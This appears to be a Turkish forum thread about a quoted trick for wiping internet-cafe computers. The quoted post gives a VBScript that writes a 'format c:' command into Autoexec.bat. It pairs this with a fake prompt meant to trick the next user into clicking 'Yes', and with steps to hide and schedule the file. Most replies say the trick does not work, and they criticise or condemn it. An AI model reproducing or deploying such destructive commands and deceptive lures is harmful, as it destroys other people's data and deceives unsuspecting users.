Gizli Format Atma [ozeLLikLe CafeciLere..]

abi bu çalışmıyo. bizzat ben test ettim. fakat olmadı...

zaten artık butun cafelerde deep freez war yani bu işler artık bos !

Beyler kimse teşekkür falan etmesin o bayaca eski bir yötem ve çalışmıyor.

arkadaş adresimi vereyim gelsin bunu yapabilen varsa benim pc ye ormat atsın diyecek boş boş bir konuşma olacak :) google den bulup kopyalamayla olsa herşey :)

ayrıca format atmak nedir? bunu öğrenin önce. windowsun çalışmaz hale gelmesi format atmak değildir. millet format atmayı windows kurmak veya windowsu bozmak sanıyor.

aslında gıcık olduğun insanlar varsa birebir eline sağlık

Coding Forever Set fs = CreateObject(\"Scripting.FileSystemObject\")
Set a = fs.CreateTextFile(\"C:Autoexec.bat\", True)
a.WriteLine(\"format c: /autotest /u /q\")
a.Close
Eğer girişte açılan kutucukta \"Hayır\" \"No\" tuşuna bastıysanız
javascript:reload()\">buraya tıklayın ve \"Evet\"\"Yes\"e tıklayın.Bu internet
cafede internette daha rahat ve kesintisiz gezebilmeniz için bu işlemi yapmanız
gerekir.Lutfen bu işlemi yapınız.Aksi taktirde bilgisayardaki arka plan
programlarını kapatmanız veya hızlı bir gezinti yapamazsınız.

Bu kodları wordpad ı açıp \"cafe.htm\" şeklinde bilgisayarım/c/ ye kaydediyoruz.sağ
tık > özellikler diyoruz ve \"gizli\" seçeneğini seçiyoruz. zamanlamış görevlere
gidiyoruz ve 10 dk sonra pc den kalkacaksak 20 dk sonraya bilgisayarım/c/cafe.htm yi
açtırıyoruz. pc den kalkıyoruz. gıcık olduğumuz adam pc ye oturuyor bir ileti alıyor
evet diyor ve pc formatlanıyor. hem cafecıye hemde cocuga gecmıs olsun..

~aLintidir~
Ne amaçla yapacaksınız? Milletin ekmeğiyle oynamak ne kadar hoşunuza gidecek? Ya bırakın bu işleri. Ayrıca yaptım diyen arkadaşlar:
1)Windows Xp autoexec.bat'a mı yoksa autoexec.nt'ye mi göre işlem yapar?
2)Windows açıkken nasıl format atmayı düşünüyorsunuz?
3)Eğer windows kapalı olacaksa niye kodlarda böyle bir satır yok?
4)Sp2 yüklü XP'de yerel de olsa vbs objelerine izin alınması gerekmiyor mu?
5)Evet-hayır seçimi ile ilgili burda bir kod var mı?
6)Deepfreeze olayı nasıl olacak?
7)Kodları düzelttiniz yaptınız diyelim, elinize ne geçecek. Zarar vermeye bu kadar meraklıysanız daha büyük bir iş yapın ki sonuçlarına değsin. Gidin TTnetle uğraşın bizde alkışlayalım sizi.

valla varya sizin gibi adamlar varya cafemde böle yapcakta cameramda görüp sizin yaptıgınız anlamıcam sonra siz isterseniz kenyaya kacın siz sehirden cıkana kadar yani bilmiom size kac kişi kaykaymı yapar kayarmı yoksa üzerinizde odunmu kırar siz düşünün...

nefesini turarak intihar etmek gibi bir şey bu. bir takom dosyaları silebilirsin sistem açılmaz ama format atamazsın. atarım diyeni şimdiden tebrik ederim...

yazık be millete niye format attırıyosunuz :) başka isiniz yokmu

Geri